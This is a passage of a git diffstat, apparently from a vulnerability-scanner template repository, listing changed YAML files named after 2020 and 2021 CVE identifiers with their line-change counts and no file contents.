+- http/cves/2020/CVE-2020-11547.yaml | 2 +- http/cves/2020/CVE-2020-11710.yaml | 2 +- http/cves/2020/CVE-2020-11738.yaml | 4 +- http/cves/2020/CVE-2020-11798.yaml | 4 +- http/cves/2020/CVE-2020-11853.yaml | 4 +- http/cves/2020/CVE-2020-11854.yaml | 2 +- http/cves/2020/CVE-2020-11930.yaml | 2 +- http/cves/2020/CVE-2020-11978.yaml | 5 +- http/cves/2020/CVE-2020-11991.yaml | 2 +- http/cves/2020/CVE-2020-12054.yaml | 2 +- http/cves/2020/CVE-2020-12116.yaml | 4 +- http/cves/2020/CVE-2020-12127.yaml | 2 +- http/cves/2020/CVE-2020-12447.yaml | 2 +- http/cves/2020/CVE-2020-12478.yaml | 4 +- http/cves/2020/CVE-2020-12720.yaml | 4 +- http/cves/2020/CVE-2020-12800.yaml | 4 +- http/cves/2020/CVE-2020-13117.yaml | 4 +- http/cves/2020/CVE-2020-13121.yaml | 2 +- http/cves/2020/CVE-2020-13158.yaml | 4 +- http/cves/2020/CVE-2020-13167.yaml | 4 +- http/cves/2020/CVE-2020-13258.yaml | 2 +- http/cves/2020/CVE-2020-13379.yaml | 4 +- http/cves/2020/CVE-2020-13405.yaml | 4 +- http/cves/2020/CVE-2020-13483.yaml | 2 +- http/cves/2020/CVE-2020-13700.yaml | 2 +- http/cves/2020/CVE-2020-13820.yaml | 2 +- http/cves/2020/CVE-2020-13927.yaml | 5 +- http/cves/2020/CVE-2020-13937.yaml | 4 +- http/cves/2020/CVE-2020-13942.yaml | 4 +- http/cves/2020/CVE-2020-13945.yaml | 4 +- http/cves/2020/CVE-2020-14092.yaml | 4 +- http/cves/2020/CVE-2020-14144.yaml | 4 +- http/cves/2020/CVE-2020-14179.yaml | 4 +- http/cves/2020/CVE-2020-14181.yaml | 4 +- http/cves/2020/CVE-2020-14408.yaml | 2 +- http/cves/2020/CVE-2020-14413.yaml | 2 +- http/cves/2020/CVE-2020-14750.yaml | 2 +- http/cves/2020/CVE-2020-14864.yaml | 4 +- http/cves/2020/CVE-2020-14882.yaml | 4 +- http/cves/2020/CVE-2020-14883.yaml | 4 +- http/cves/2020/CVE-2020-15050.yaml | 4 +- http/cves/2020/CVE-2020-15129.yaml | 4 +- http/cves/2020/CVE-2020-15148.yaml | 4 +- http/cves/2020/CVE-2020-15227.yaml | 4 +- http/cves/2020/CVE-2020-15500.yaml | 2 +- http/cves/2020/CVE-2020-15505.yaml | 4 +- http/cves/2020/CVE-2020-15568.yaml | 4 +- http/cves/2020/CVE-2020-15867.yaml | 4 +- http/cves/2020/CVE-2020-15895.yaml | 2 +- http/cves/2020/CVE-2020-15920.yaml | 4 +- http/cves/2020/CVE-2020-16139.yaml | 4 +- http/cves/2020/CVE-2020-16846.yaml | 4 +- http/cves/2020/CVE-2020-16952.yaml | 4 +- http/cves/2020/CVE-2020-17362.yaml | 2 +- http/cves/2020/CVE-2020-17453.yaml | 2 +- http/cves/2020/CVE-2020-17456.yaml | 4 +- http/cves/2020/CVE-2020-17463.yaml | 4 +- http/cves/2020/CVE-2020-17496.yaml | 4 +- http/cves/2020/CVE-2020-17505.yaml | 4 +- http/cves/2020/CVE-2020-17506.yaml | 4 +- http/cves/2020/CVE-2020-17518.yaml | 4 +- http/cves/2020/CVE-2020-17519.yaml | 4 +- http/cves/2020/CVE-2020-17526.yaml | 4 +- http/cves/2020/CVE-2020-17530.yaml | 4 +- http/cves/2020/CVE-2020-18268.yaml | 2 +- http/cves/2020/CVE-2020-19282.yaml | 2 +- http/cves/2020/CVE-2020-19283.yaml | 2 +- http/cves/2020/CVE-2020-19295.yaml | 2 +- http/cves/2020/CVE-2020-19360.yaml | 4 +- http/cves/2020/CVE-2020-1943.yaml | 4 +- http/cves/2020/CVE-2020-19515.yaml | 2 +- http/cves/2020/CVE-2020-1956.yaml | 4 +- http/cves/2020/CVE-2020-19625.yaml | 4 +- http/cves/2020/CVE-2020-20285.yaml | 2 +- http/cves/2020/CVE-2020-20300.yaml | 4 +- http/cves/2020/CVE-2020-2036.yaml | 2 +- http/cves/2020/CVE-2020-2096.yaml | 4 +- http/cves/2020/CVE-2020-20982.yaml | 2 +- http/cves/2020/CVE-2020-20988.yaml | 2 +- http/cves/2020/CVE-2020-21012.yaml | 4 +- http/cves/2020/CVE-2020-2103.yaml | 4 +- http/cves/2020/CVE-2020-21224.yaml | 4 +- http/cves/2020/CVE-2020-2140.yaml | 2 +- http/cves/2020/CVE-2020-22208.yaml | 2 +- http/cves/2020/CVE-2020-22209.yaml | 2 +- http/cves/2020/CVE-2020-22210.yaml | 2 +- http/cves/2020/CVE-2020-22211.yaml | 2 +- http/cves/2020/CVE-2020-22840.yaml | 4 +- http/cves/2020/CVE-2020-23015.yaml | 2 +- http/cves/2020/CVE-2020-23517.yaml | 2 +- http/cves/2020/CVE-2020-23575.yaml | 2 +- http/cves/2020/CVE-2020-23697.yaml | 2 +- http/cves/2020/CVE-2020-23972.yaml | 4 +- http/cves/2020/CVE-2020-24148.yaml | 2 +- http/cves/2020/CVE-2020-24186.yaml | 4 +- http/cves/2020/CVE-2020-24223.yaml | 2 +- http/cves/2020/CVE-2020-24312.yaml | 4 +- http/cves/2020/CVE-2020-24391.yaml | 4 +- http/cves/2020/CVE-2020-24550.yaml | 2 +- http/cves/2020/CVE-2020-24571.yaml | 4 +- http/cves/2020/CVE-2020-24579.yaml | 4 +- http/cves/2020/CVE-2020-24589.yaml | 4 +- http/cves/2020/CVE-2020-24902.yaml | 4 +- http/cves/2020/CVE-2020-24903.yaml | 4 +- http/cves/2020/CVE-2020-24912.yaml | 4 +- http/cves/2020/CVE-2020-24949.yaml | 4 +- http/cves/2020/CVE-2020-25078.yaml | 2 +- http/cves/2020/CVE-2020-25213.yaml | 4 +- http/cves/2020/CVE-2020-25223.yaml | 4 +- http/cves/2020/CVE-2020-25495.yaml | 4 +- http/cves/2020/CVE-2020-25506.yaml | 4 +- http/cves/2020/CVE-2020-2551.yaml | 4 +- http/cves/2020/CVE-2020-25540.yaml | 2 +- http/cves/2020/CVE-2020-25780.yaml | 2 +- http/cves/2020/CVE-2020-25864.yaml | 2 +- http/cves/2020/CVE-2020-26153.yaml | 2 +- http/cves/2020/CVE-2020-26214.yaml | 2 +- http/cves/2020/CVE-2020-26217.yaml | 2 +- http/cves/2020/CVE-2020-26248.yaml | 2 +- http/cves/2020/CVE-2020-26258.yaml | 2 +- http/cves/2020/CVE-2020-26413.yaml | 2 +- http/cves/2020/CVE-2020-26876.yaml | 2 +- http/cves/2020/CVE-2020-26919.yaml | 4 +- http/cves/2020/CVE-2020-26948.yaml | 4 +- http/cves/2020/CVE-2020-27191.yaml | 4 +- http/cves/2020/CVE-2020-2733.yaml | 4 +- http/cves/2020/CVE-2020-27361.yaml | 2 +- http/cves/2020/CVE-2020-27467.yaml | 4 +- http/cves/2020/CVE-2020-27481.yaml | 4 +- http/cves/2020/CVE-2020-27735.yaml | 4 +- http/cves/2020/CVE-2020-27866.yaml | 4 +- http/cves/2020/CVE-2020-27982.yaml | 2 +- http/cves/2020/CVE-2020-27986.yaml | 2 +- http/cves/2020/CVE-2020-28185.yaml | 4 +- http/cves/2020/CVE-2020-28188.yaml | 4 +- http/cves/2020/CVE-2020-28208.yaml | 2 +- http/cves/2020/CVE-2020-28351.yaml | 2 +- http/cves/2020/CVE-2020-28871.yaml | 4 +- http/cves/2020/CVE-2020-28976.yaml | 2 +- http/cves/2020/CVE-2020-29164.yaml | 4 +- http/cves/2020/CVE-2020-29227.yaml | 4 +- http/cves/2020/CVE-2020-29284.yaml | 2 +- http/cves/2020/CVE-2020-29395.yaml | 2 +- http/cves/2020/CVE-2020-29453.yaml | 4 +- http/cves/2020/CVE-2020-29583.yaml | 4 +- http/cves/2020/CVE-2020-29597.yaml | 4 +- http/cves/2020/CVE-2020-3187.yaml | 4 +- http/cves/2020/CVE-2020-3452.yaml | 4 +- http/cves/2020/CVE-2020-35234.yaml | 4 +- http/cves/2020/CVE-2020-35338.yaml | 4 +- http/cves/2020/CVE-2020-35476.yaml | 4 +- http/cves/2020/CVE-2020-35489.yaml | 4 +- http/cves/2020/CVE-2020-35580.yaml | 4 +- http/cves/2020/CVE-2020-35598.yaml | 4 +- http/cves/2020/CVE-2020-35713.yaml | 4 +- http/cves/2020/CVE-2020-35729.yaml | 4 +- http/cves/2020/CVE-2020-35736.yaml | 4 +- http/cves/2020/CVE-2020-35749.yaml | 4 +- http/cves/2020/CVE-2020-35774.yaml | 2 +- http/cves/2020/CVE-2020-3580.yaml | 4 +- http/cves/2020/CVE-2020-35846.yaml | 4 +- http/cves/2020/CVE-2020-35847.yaml | 4 +- http/cves/2020/CVE-2020-35848.yaml | 4 +- http/cves/2020/CVE-2020-35951.yaml | 4 +- http/cves/2020/CVE-2020-35984.yaml | 2 +- http/cves/2020/CVE-2020-35985.yaml | 2 +- http/cves/2020/CVE-2020-35986.yaml | 2 +- http/cves/2020/CVE-2020-35987.yaml | 2 +- http/cves/2020/CVE-2020-36112.yaml | 4 +- http/cves/2020/CVE-2020-36289.yaml | 4 +- http/cves/2020/CVE-2020-36365.yaml | 2 +- http/cves/2020/CVE-2020-36510.yaml | 4 +- http/cves/2020/CVE-2020-4463.yaml | 4 +- http/cves/2020/CVE-2020-5191.yaml | 4 +- http/cves/2020/CVE-2020-5192.yaml | 4 +- http/cves/2020/CVE-2020-5284.yaml | 2 +- http/cves/2020/CVE-2020-5307.yaml | 4 +- http/cves/2020/CVE-2020-5405.yaml | 2 +- http/cves/2020/CVE-2020-5410.yaml | 4 +- http/cves/2020/CVE-2020-5412.yaml | 8 +- http/cves/2020/CVE-2020-5775.yaml | 2 +- http/cves/2020/CVE-2020-5776.yaml | 2 +- http/cves/2020/CVE-2020-5777.yaml | 2 +- http/cves/2020/CVE-2020-5847.yaml | 4 +- http/cves/2020/CVE-2020-5902.yaml | 4 +- http/cves/2020/CVE-2020-6171.yaml | 2 +- http/cves/2020/CVE-2020-6207.yaml | 4 +- http/cves/2020/CVE-2020-6287.yaml | 6 +- http/cves/2020/CVE-2020-6308.yaml | 2 +- http/cves/2020/CVE-2020-6637.yaml | 2 +- http/cves/2020/CVE-2020-7107.yaml | 2 +- http/cves/2020/CVE-2020-7136.yaml | 4 +- http/cves/2020/CVE-2020-7209.yaml | 4 +- http/cves/2020/CVE-2020-7318.yaml | 2 +- http/cves/2020/CVE-2020-7796.yaml | 2 +- http/cves/2020/CVE-2020-7943.yaml | 2 +- http/cves/2020/CVE-2020-7961.yaml | 4 +- http/cves/2020/CVE-2020-7980.yaml | 4 +- http/cves/2020/CVE-2020-8115.yaml | 2 +- http/cves/2020/CVE-2020-8163.yaml | 4 +- http/cves/2020/CVE-2020-8191.yaml | 2 +- http/cves/2020/CVE-2020-8193.yaml | 4 +- http/cves/2020/CVE-2020-8194.yaml | 4 +- http/cves/2020/CVE-2020-8209.yaml | 4 +- http/cves/2020/CVE-2020-8497.yaml | 2 +- http/cves/2020/CVE-2020-8512.yaml | 4 +- http/cves/2020/CVE-2020-8515.yaml | 4 +- http/cves/2020/CVE-2020-8641.yaml | 4 +- http/cves/2020/CVE-2020-8644.yaml | 4 +- http/cves/2020/CVE-2020-8654.yaml | 2 +- http/cves/2020/CVE-2020-8771.yaml | 2 +- http/cves/2020/CVE-2020-8772.yaml | 4 +- http/cves/2020/CVE-2020-8813.yaml | 4 +- http/cves/2020/CVE-2020-8982.yaml | 4 +- http/cves/2020/CVE-2020-9036.yaml | 2 +- http/cves/2020/CVE-2020-9043.yaml | 2 +- http/cves/2020/CVE-2020-9047.yaml | 2 +- http/cves/2020/CVE-2020-9054.yaml | 4 +- http/cves/2020/CVE-2020-9315.yaml | 4 +- http/cves/2020/CVE-2020-9344.yaml | 2 +- http/cves/2020/CVE-2020-9376.yaml | 4 +- http/cves/2020/CVE-2020-9402.yaml | 4 +- http/cves/2020/CVE-2020-9425.yaml | 2 +- http/cves/2020/CVE-2020-9483.yaml | 4 +- http/cves/2020/CVE-2020-9484.yaml | 4 +- http/cves/2020/CVE-2020-9496.yaml | 4 +- http/cves/2020/CVE-2020-9757.yaml | 4 +- http/cves/2021/CVE-2021-1472.yaml | 6 +- http/cves/2021/CVE-2021-1497.yaml | 4 +- http/cves/2021/CVE-2021-1498.yaml | 4 +- http/cves/2021/CVE-2021-1499.yaml | 4 +- http/cves/2021/CVE-2021-20031.yaml | 2 +- http/cves/2021/CVE-2021-20038.yaml | 4 +- http/cves/2021/CVE-2021-20090.yaml | 4 +- http/cves/2021/CVE-2021-20091.yaml | 4 +- http/cves/2021/CVE-2021-20092.yaml | 2 +- http/cves/2021/CVE-2021-20114.yaml | 2 +- http/cves/2021/CVE-2021-20123.yaml | 4 +- http/cves/2021/CVE-2021-20124.yaml | 4 +- http/cves/2021/CVE-2021-20137.yaml | 2 +- http/cves/2021/CVE-2021-20150.yaml | 4 +- http/cves/2021/CVE-2021-20158.yaml | 2 +- http/cves/2021/CVE-2021-20167.yaml | 4 +- http/cves/2021/CVE-2021-20323.yaml | 4 +- http/cves/2021/CVE-2021-20792.yaml | 2 +- http/cves/2021/CVE-2021-20837.yaml | 4 +- http/cves/2021/CVE-2021-21087.yaml | 4 +- http/cves/2021/CVE-2021-21234.yaml | 4 +- http/cves/2021/CVE-2021-21287.yaml | 2 +- http/cves/2021/CVE-2021-21307.yaml | 4 +- http/cves/2021/CVE-2021-21311.yaml | 4 +- http/cves/2021/CVE-2021-21315.yaml | 4 +- http/cves/2021/CVE-2021-21345.yaml | 4 +- http/cves/2021/CVE-2021-21351.yaml | 4 +- http/cves/2021/CVE-2021-21389.yaml | 4 +- http/cves/2021/CVE-2021-21402.yaml | 4 +- http/cves/2021/CVE-2021-21479.yaml | 4 +- http/cves/2021/CVE-2021-21745.yaml | 4 +- http/cves/2021/CVE-2021-21799.yaml | 4 +- http/cves/2021/CVE-2021-21800.yaml | 4 +- http/cves/2021/CVE-2021-21801.yaml | 4 +- http/cves/2021/CVE-2021-21802.yaml | 4 +- http/cves/2021/CVE-2021-21803.yaml | 4 +- http/cves/2021/CVE-2021-21805.yaml | 4 +- http/cves/2021/CVE-2021-21816.yaml | 2 +- http/cves/2021/CVE-2021-21881.yaml | 4 +- http/cves/2021/CVE-2021-21972.yaml | 4 +- http/cves/2021/CVE-2021-21973.yaml | 4 +- http/cves/2021/CVE-2021-21975.yaml | 4 +- http/cves/2021/CVE-2021-21978.yaml | 4 +- http/cves/2021/CVE-2021-21985.yaml | 4 +- http/cves/2021/CVE-2021-22005.yaml | 4 +- http/cves/2021/CVE-2021-22053.yaml | 4 +- http/cves/2021/CVE-2021-22054.yaml | 4 +- http/cves/2021/CVE-2021-22122.yaml | 4 +- http/cves/2021/CVE-2021-22145.yaml | 4 +- http/cves/2021/CVE-2021-22205.yaml | 4 +- http/cves/2021/CVE-2021-22214.yaml | 4 +- http/cves/2021/CVE-2021-22502.yaml | 4 +- http/cves/2021/CVE-2021-22707.yaml | 2 +- http/cves/2021/CVE-2021-22873.yaml | 4 +- http/cves/2021/CVE-2021-22911.yaml | 2 +- http/cves/2021/CVE-2021-22986.yaml | 4 +- http/cves/2021/CVE-2021-23241.yaml | 4 +- http/cves/2021/CVE-2021-24145.yaml | 4 +- http/cves/2021/CVE-2021-24146.yaml | 2 +- http/cves/2021/CVE-2021-24150.yaml | 4 +- http/cves/2021/CVE-2021-24155.yaml | 4 +- http/cves/2021/CVE-2021-24165.yaml | 2 +- http/cves/2021/CVE-2021-24169.yaml | 2 +- http/cves/2021/CVE-2021-24176.yaml | 2 +- http/cves/2021/CVE-2021-24210.yaml | 2 +- http/cves/2021/CVE-2021-24214.yaml | 2 +- http/cves/2021/CVE-2021-24226.yaml | 2 +- http/cves/2021/CVE-2021-24227.yaml | 2 +- http/cves/2021/CVE-2021-24235.yaml | 2 +- http/cves/2021/CVE-2021-24236.yaml | 2 +- http/cves/2021/CVE-2021-24237.yaml | 4 +- http/cves/2021/CVE-2021-24239.yaml | 2 +- http/cves/2021/CVE-2021-24245.yaml | 2 +- http/cves/2021/CVE-2021-24274.yaml | 2 +- http/cves/2021/CVE-2021-24275.yaml | 2 +- http/cves/2021/CVE-2021-24276.yaml | 2 +- http/cves/2021/CVE-2021-24278.yaml | 4 +- http/cves/2021/CVE-2021-24284.yaml | 2 +- http/cves/2021/CVE-2021-24285.yaml | 4 +- http/cves/2021/CVE-2021-24287.yaml | 2 +- http/cves/2021/CVE-2021-24288.yaml | 2 +- http/cves/2021/CVE-2021-24291.yaml | 2 +- http/cves/2021/CVE-2021-24298.yaml | 2 +- http/cves/2021/CVE-2021-24300.yaml | 2 +- http/cves/2021/CVE-2021-24316.yaml | 2 +- http/cves/2021/CVE-2021-24320.yaml | 2 +- http/cves/2021/CVE-2021-24335.yaml | 2 +- http/cves/2021/CVE-2021-24340.yaml | 4 +- http/cves/2021/CVE-2021-24342.yaml | 2 +- http/cves/2021/CVE-2021-24347.yaml | 2 +- http/cves/2021/CVE-2021-24351.yaml | 2 +- http/cves/2021/CVE-2021-24358.yaml | 2 +- http/cves/2021/CVE-2021-24364.yaml | 2 +- http/cves/2021/CVE-2021-24370.yaml | 4 +- http/cves/2021/CVE-2021-24387.yaml | 2 +- http/cves/2021/CVE-2021-24389.yaml | 2 +- http/cves/2021/CVE-2021-24406.yaml | 2 +- http/cves/2021/CVE-2021-24407.yaml | 2 +- http/cves/2021/CVE-2021-24409.yaml | 2 +- http/cves/2021/CVE-2021-24435.yaml | 2 +- http/cves/2021/CVE-2021-24436.yaml | 2 +- http/cves/2021/CVE-2021-24452.yaml | 2 +- http/cves/2021/CVE-2021-24472.yaml | 2 +- http/cves/2021/CVE-2021-24488.yaml | 2 +- http/cves/2021/CVE-2021-24495.yaml | 2 +- http/cves/2021/CVE-2021-24498.yaml | 2 +- http/cves/2021/CVE-2021-24499.yaml | 2 +- http/cves/2021/CVE-2021-24510.yaml | 2 +- http/cves/2021/CVE-2021-24554.yaml | 4 +- http/cves/2021/CVE-2021-24647.yaml | 2 +- http/cves/2021/CVE-2021-24666.yaml | 4 +- http/cves/2021/CVE-2021-24731.yaml | 4 +- http/cves/2021/CVE-2021-24746.yaml | 4 +- http/cves/2021/CVE-2021-24750.yaml | 2 +- http/cves/2021/CVE-2021-24762.yaml | 2 +- http/cves/2021/CVE-2021-24827.yaml | 4 +- http/cves/2021/CVE-2021-24838.yaml | 2 +- http/cves/2021/CVE-2021-24862.yaml | 4 +- http/cves/2021/CVE-2021-24875.yaml | 2 +- http/cves/2021/CVE-2021-24891.yaml | 2 +- http/cves/2021/CVE-2021-24910.yaml | 2 +- http/cves/2021/CVE-2021-24917.yaml | 4 +- http/cves/2021/CVE-2021-24926.yaml | 2 +- http/cves/2021/CVE-2021-24931.yaml | 4 +- http/cves/2021/CVE-2021-24940.yaml | 4 +- http/cves/2021/CVE-2021-24946.yaml | 4 +- http/cves/2021/CVE-2021-24947.yaml | 4 +- http/cves/2021/CVE-2021-24956.yaml | 2 +- http/cves/2021/CVE-2021-24970.yaml | 4 +- http/cves/2021/CVE-2021-24987.yaml | 4 +- http/cves/2021/CVE-2021-24991.yaml | 2 +- http/cves/2021/CVE-2021-24997.yaml | 4 +- http/cves/2021/CVE-2021-25003.yaml | 4 +- http/cves/2021/CVE-2021-25008.yaml | 2 +- http/cves/2021/CVE-2021-25028.yaml | 2 +- http/cves/2021/CVE-2021-25033.yaml | 4 +- http/cves/2021/CVE-2021-25052.yaml | 4 +- http/cves/2021/CVE-2021-25055.yaml | 4 +- http/cves/2021/CVE-2021-25063.yaml | 2 +- http/cves/2021/CVE-2021-25065.yaml | 2 +- http/cves/2021/CVE-2021-25067.yaml | 2 +- http/cves/2021/CVE-2021-25074.yaml | 2 +- http/cves/2021/CVE-2021-25075.yaml | 4 +- http/cves/2021/CVE-2021-25078.yaml | 2 +- http/cves/2021/CVE-2021-25085.yaml | 2 +- http/cves/2021/CVE-2021-25099.yaml | 4 +- http/cves/2021/CVE-2021-25104.yaml | 2 +- http/cves/2021/CVE-2021-25111.yaml | 4 +- http/cves/2021/CVE-2021-25112.yaml | 4 +- http/cves/2021/CVE-2021-25114.yaml | 4 +- http/cves/2021/CVE-2021-25118.yaml | 4 +- http/cves/2021/CVE-2021-25120.yaml | 4 +- http/cves/2021/CVE-2021-25281.yaml | 4 +- http/cves/2021/CVE-2021-25296.yaml | 2 +- http/cves/2021/CVE-2021-25297.yaml | 2 +- http/cves/2021/CVE-2021-25298.yaml | 2 +- http/cves/2021/CVE-2021-25299.yaml | 4 +- http/cves/2021/CVE-2021-25646.yaml | 4 +- http/cves/2021/CVE-2021-25864.yaml | 4 +- http/cves/2021/CVE-2021-25899.yaml | 4 +- http/cves/2021/CVE-2021-26084.yaml | 4 +- http/cves/2021/CVE-2021-26085.yaml | 4 +- http/cves/2021/CVE-2021-26086.yaml | 4 +- http/cves/2021/CVE-2021-26247.yaml | 4 +- http/cves/2021/CVE-2021-26295.yaml | 4 +- http/cves/2021/CVE-2021-26475.yaml | 4 +- http/cves/2021/CVE-2021-26598.yaml | 4 +- http/cves/2021/CVE-2021-26702.yaml | 4 +- http/cves/2021/CVE-2021-26710.yaml | 4 +- http/cves/2021/CVE-2021-26723.yaml | 4 +- http/cves/2021/CVE-2021-26812.yaml | 4 +- http/cves/2021/CVE-2021-26855.yaml | 4 +- http/cves/2021/CVE-2021-27124.yaml | 4 +- http/cves/2021/CVE-2021-27132.yaml | 4 +- http/cves/2021/CVE-2021-27309.yaml | 2 +- http/cves/2021/CVE-2021-27310.yaml | 2 +- http/cves/2021/CVE-2021-27314.yaml | 4 +- http/cves/2021/CVE-2021-27315.yaml | 2 +- http/cves/2021/CVE-2021-27316.yaml | 2 +- http/cves/2021/CVE-2021-27319.yaml | 2 +- http/cves/2021/CVE-2021-27320.yaml | 2 +- http/cves/2021/CVE-2021-27330.yaml | 4 +- http/cves/2021/CVE-2021-27358.yaml | 4 +- http/cves/2021/CVE-2021-27519.yaml | 2 +- http/cves/2021/CVE-2021-27520.yaml | 2 +- http/cves/2021/CVE-2021-27561.yaml | 4 +- http/cves/2021/CVE-2021-27651.yaml | 4 +- http/cves/2021/CVE-2021-27670.yaml | 4 +- http/cves/2021/CVE-2021-27850.yaml | 2 +- http/cves/2021/CVE-2021-27905.yaml | 4 +- http/cves/2021/CVE-2021-27909.yaml | 2 +- http/cves/2021/CVE-2021-27931.yaml | 4 +- http/cves/2021/CVE-2021-28149.yaml | 2 +- http/cves/2021/CVE-2021-28150.yaml | 2 +- http/cves/2021/CVE-2021-28151.yaml | 4 +- http/cves/2021/CVE-2021-28164.yaml | 2 +- http/cves/2021/CVE-2021-28169.yaml | 2 +- http/cves/2021/CVE-2021-28377.yaml | 2 +- http/cves/2021/CVE-2021-28419.yaml | 2 +- http/cves/2021/CVE-2021-28918.yaml | 2 +- http/cves/2021/CVE-2021-28937.yaml | 2 +- http/cves/2021/CVE-2021-29156.yaml | 4 +- http/cves/2021/CVE-2021-29203.yaml | 2 +- http/cves/2021/CVE-2021-29441.yaml | 2 +- http/cves/2021/CVE-2021-29442.yaml | 2 +- http/cves/2021/CVE-2021-29484.yaml | 2 +- http/cves/2021/CVE-2021-29490.yaml | 2 +- http/cves/2021/CVE-2021-29505.yaml | 2 +- http/cves/2021/CVE-2021-29622.yaml | 2 +- http/cves/2021/CVE-2021-29625.yaml | 2 +- http/cves/2021/CVE-2021-3002.yaml | 4 +- http/cves/2021/CVE-2021-30049.yaml | 2 +- http/cves/2021/CVE-2021-30128.yaml | 2 +- http/cves/2021/CVE-2021-30134.yaml | 2 +- http/cves/2021/CVE-2021-30151.yaml | 2 +- http/cves/2021/CVE-2021-3017.yaml | 2 +- http/cves/2021/CVE-2021-30175.yaml | 4 +- http/cves/2021/CVE-2021-3019.yaml | 4 +- http/cves/2021/CVE-2021-30213.yaml | 2 +- http/cves/2021/CVE-2021-30461.yaml | 2 +- http/cves/2021/CVE-2021-30497.yaml | 4 +- http/cves/2021/CVE-2021-3110.yaml | 2 +- http/cves/2021/CVE-2021-31195.yaml | 4 +- http/cves/2021/CVE-2021-31249.yaml | 2 +- http/cves/2021/CVE-2021-31250.yaml | 2 +- http/cves/2021/CVE-2021-3129.yaml | 6 +- http/cves/2021/CVE-2021-31537.yaml | 2 +- http/cves/2021/CVE-2021-31581.yaml | 4 +- http/cves/2021/CVE-2021-31589.yaml | 4 +- http/cves/2021/CVE-2021-31602.yaml | 2 +- http/cves/2021/CVE-2021-31682.yaml | 2 +- http/cves/2021/CVE-2021-31755.yaml | 2 +- http/cves/2021/CVE-2021-31805.yaml | 4 +- http/cves/2021/CVE-2021-31856.yaml | 2 +- http/cves/2021/CVE-2021-31862.yaml | 2 +- http/cves/2021/CVE-2021-32030.yaml | 4 +- http/cves/2021/CVE-2021-32172.yaml | 4 +- http/cves/2021/CVE-2021-3223.yaml | 4 +- http/cves/2021/CVE-2021-32305.yaml | 4 +- http/cves/2021/CVE-2021-32618.yaml | 2 +- http/cves/2021/CVE-2021-32682.yaml | 4 +- http/cves/2021/CVE-2021-32789.yaml | 4 +- http/cves/2021/CVE-2021-32819.yaml | 2 +- http/cves/2021/CVE-2021-32820.yaml | 4 +- http/cves/2021/CVE-2021-32853.yaml | 4 +- http/cves/2021/CVE-2021-3293.yaml | 4 +- http/cves/2021/CVE-2021-3297.yaml | 2 +- http/cves/2021/CVE-2021-33044.yaml | 4 +- http/cves/2021/CVE-2021-33221.yaml | 2 +- http/cves/2021/CVE-2021-33357.yaml | 4 +- http/cves/2021/CVE-2021-33544.yaml | 2 +- http/cves/2021/CVE-2021-33564.yaml | 2 +- http/cves/2021/CVE-2021-3374.yaml | 2 +- http/cves/2021/CVE-2021-3377.yaml | 4 +- http/cves/2021/CVE-2021-3378.yaml | 4 +- http/cves/2021/CVE-2021-33807.yaml | 4 +- http/cves/2021/CVE-2021-33851.yaml | 4 +- http/cves/2021/CVE-2021-33904.yaml | 2 +- http/cves/2021/CVE-2021-34370.yaml | 2 +- http/cves/2021/CVE-2021-34429.yaml | 4 +- http/cves/2021/CVE-2021-34473.yaml | 4 +- http/cves/2021/CVE-2021-34621.yaml | 4 +- http/cves/2021/CVE-2021-34640.yaml | 2 +- http/cves/2021/CVE-2021-34643.yaml | 2 +- http/cves/2021/CVE-2021-34805.yaml | 4 +- http/cves/2021/CVE-2021-35250.yaml | 4 +- http/cves/2021/CVE-2021-35265.yaml | 2 +- http/cves/2021/CVE-2021-35336.yaml | 4 +- http/cves/2021/CVE-2021-35380.yaml | 4 +- http/cves/2021/CVE-2021-35464.yaml | 6 +- http/cves/2021/CVE-2021-35488.yaml | 2 +- http/cves/2021/CVE-2021-35587.yaml | 4 +- http/cves/2021/CVE-2021-3577.yaml | 6 +- http/cves/2021/CVE-2021-36260.yaml | 4 +- http/cves/2021/CVE-2021-36356.yaml | 4 +- http/cves/2021/CVE-2021-36380.yaml | 4 +- http/cves/2021/CVE-2021-36450.yaml | 4 +- http/cves/2021/CVE-2021-3654.yaml | 4 +- http/cves/2021/CVE-2021-36580.yaml | 2 +- http/cves/2021/CVE-2021-36748.yaml | 4 +- http/cves/2021/CVE-2021-36749.yaml | 4 +- http/cves/2021/CVE-2021-36873.yaml | 2 +- http/cves/2021/CVE-2021-37216.yaml | 2 +- http/cves/2021/CVE-2021-37304.yaml | 4 +- http/cves/2021/CVE-2021-37305.yaml | 4 +- http/cves/2021/CVE-2021-37416.yaml | 2 +- http/cves/2021/CVE-2021-37538.yaml | 4 +- http/cves/2021/CVE-2021-37573.yaml | 2 +- http/cves/2021/CVE-2021-37580.yaml | 4 +- http/cves/2021/CVE-2021-37589.yaml | 2 +- http/cves/2021/CVE-2021-37704.yaml | 4 +- http/cves/2021/CVE-2021-37833.yaml | 2 +- http/cves/2021/CVE-2021-38314.yaml | 4 +- http/cves/2021/CVE-2021-38540.yaml | 6 +- http/cves/2021/CVE-2021-38647.yaml | 4 +- http/cves/2021/CVE-2021-38702.yaml | 4 +- http/cves/2021/CVE-2021-38704.yaml | 2 +- http/cves/2021/CVE-2021-38751.yaml | 2 +- http/cves/2021/CVE-2021-39141.yaml | 4 +- http/cves/2021/CVE-2021-39144.yaml | 4 +- http/cves/2021/CVE-2021-39146.yaml | 2 +- http/cves/2021/CVE-2021-39152.yaml | 2 +- http/cves/2021/CVE-2021-39165.yaml | 4 +- http/cves/2021/CVE-2021-39211.yaml | 4 +- http/cves/2021/CVE-2021-39226.yaml | 4 +- http/cves/2021/CVE-2021-39312.yaml | 4 +- http/cves/2021/CVE-2021-39316.yaml | 2 +- http/cves/2021/CVE-2021-39320.yaml | 2 +- http/cves/2021/CVE-2021-39322.yaml | 2 +- http/cves/2021/CVE-2021-39327.yaml | 6 +- http/cves/2021/CVE-2021-39350.yaml | 2 +- http/cves/2021/CVE-2021-39433.yaml | 4 +- http/cves/2021/CVE-2021-39501.yaml | 2 +- http/cves/2021/CVE-2021-40149.yaml | 2 +- http/cves/2021/CVE-2021-40150.yaml | 4 +- http/cves/2021/CVE-2021-40323.yaml | 4 +- http/cves/2021/CVE-2021-40438.yaml | 4 +- http/cves/2021/CVE-2021-40539.yaml | 4 +- http/cves/2021/CVE-2021-40542.yaml | 2 +- http/cves/2021/CVE-2021-40661.yaml | 4 +- http/cves/2021/CVE-2021-40822.yaml | 4 +- http/cves/2021/CVE-2021-40856.yaml | 2 +- http/cves/2021/CVE-2021-40859.yaml | 2 +- http/cves/2021/CVE-2021-40868.yaml | 4 +- http/cves/2021/CVE-2021-40870.yaml | 4 +- http/cves/2021/CVE-2021-40875.yaml | 4 +- http/cves/2021/CVE-2021-40908.yaml | 4 +- http/cves/2021/CVE-2021-40960.yaml | 2 +- 